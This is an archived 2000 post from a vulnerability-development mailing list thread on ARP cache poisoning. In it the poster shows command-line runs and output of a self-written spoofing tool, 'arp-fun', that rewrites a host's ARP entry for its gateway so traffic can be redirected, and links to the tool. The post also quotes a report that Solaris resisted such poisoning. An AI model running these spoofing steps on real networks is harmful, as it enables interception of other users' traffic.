Vulnerability Development mailing list archives
Re: More on ARP cache poisoning
From: ulandron () UNDERSEC COM (ulan)
Date: Wed, 2 Feb 2000 15:05:59 +0100
First at all, greetings, this is my first post to this list. Last summer I was very interested in the subject, because a friend of mine told me that he got one of the first cable-modem internet connections in spain, with a provider called telecable. It was impossible to put that modem in promisc mode, so I wrote a little tool that combined with ip aliasing allowed us to redirect most of the traffic through his host. It worked against any sort of win, openbsd 2.5 and various linux versions. Example: (hostnames removed) # uname -a OpenBSD black 2.5 Black#1 i386 # arp -a (192.168.1.2) at 52:54:ab:dd:45:78 #
From 192.168.1.2:
Boot:~ # arp-fun -i eth0 -s 192.168.1.1 -d 192.168.1.3 -a FE:45:32:FA:3A:0E Sent a 42 byte ARP request looking for the MAC of 192.168.1.3. Waiting for a response... Got target hardware address: 0:50:4:39:5a:5d Everything fine, 'til now. Let's build the packet Packet sent, memory freed, link closed; see ya! Back to "Black": # arp -a (192.168.1.1) at fe:45:32:fa:3a:e (192.168.1.2) at 52:54:ab:dd:45:78 # Back to 192.168.1.2 Boot:~ # arp-fun -i eth0 -s 192.168.1.1 -d 192.168.1.3 -a FE:FE:FE:FE:FE:FE Sent a 42 byte ARP request looking for the MAC of 192.168.1.3. Waiting for a response... Got target hardware address: 0:50:4:39:5a:5d Everything fine, 'til now. Let's build the packet Packet sent, memory freed, link closed; see ya! Boot:~ # After, returning to black: # arp -a (192.168.1.1) at fe:fe:fe:fe:fe:fe (192.168.1.2) at 52:54:ab:dd:45:78 # Then setting up an alias for 192.168.1.1 with your own mac.... The tool can be found at http://undersec.com/members/ulandron/index.shtml. And, one last thing: excuse me if I my english or my logic have any mistakes. saludos ulandron On Tue, 1 Feb 2000, Clifford, Shawn A wrote:
I tried to see if it would be possible to poison the ARP cache of my machine (Solaris 2.6) so that it contained an Ether address of a local machine, but the IP address of a machine outside my network (prep.ai.mit.edu, for example). I didn't work. Not with the 'poink' program nor with 'arp -s <host> <ether>'. The ARP cache in Solaris anyway is smart enough to not take entries for remote networks. Maybe someone else can try on Linux and other platforms. I will try under HP-sUX when I get a chance.
Current thread:
- More on ARP cache poisoning Clifford, Shawn A (Feb 01)
- Re: More on ARP cache poisoning Forrest W. Christian (Feb 01)
- Re: More on ARP cache poisoning Sebastian (Feb 02)
- Re: More on ARP cache poisoning Granquist, Lamont (Feb 03)
- Re: More on ARP cache poisoning ulan (Feb 02)
- <Possible follow-ups>
- Re: More on ARP cache poisoning Clifford, Shawn A (Feb 01)
- Re: More on ARP cache poisoning Dug Song (Feb 01)
- Re: More on ARP cache poisoning Mudge (Feb 03)
- no comment Michal Zalewski (Feb 02)
- Re: no comment Michal Zalewski (Feb 02)
- Re: More on ARP cache poisoning Dug Song (Feb 01)
- Re: More on ARP cache poisoning Bryce Walter (Feb 02)
- Re: More on ARP cache poisoning Ron Parker (Feb 03)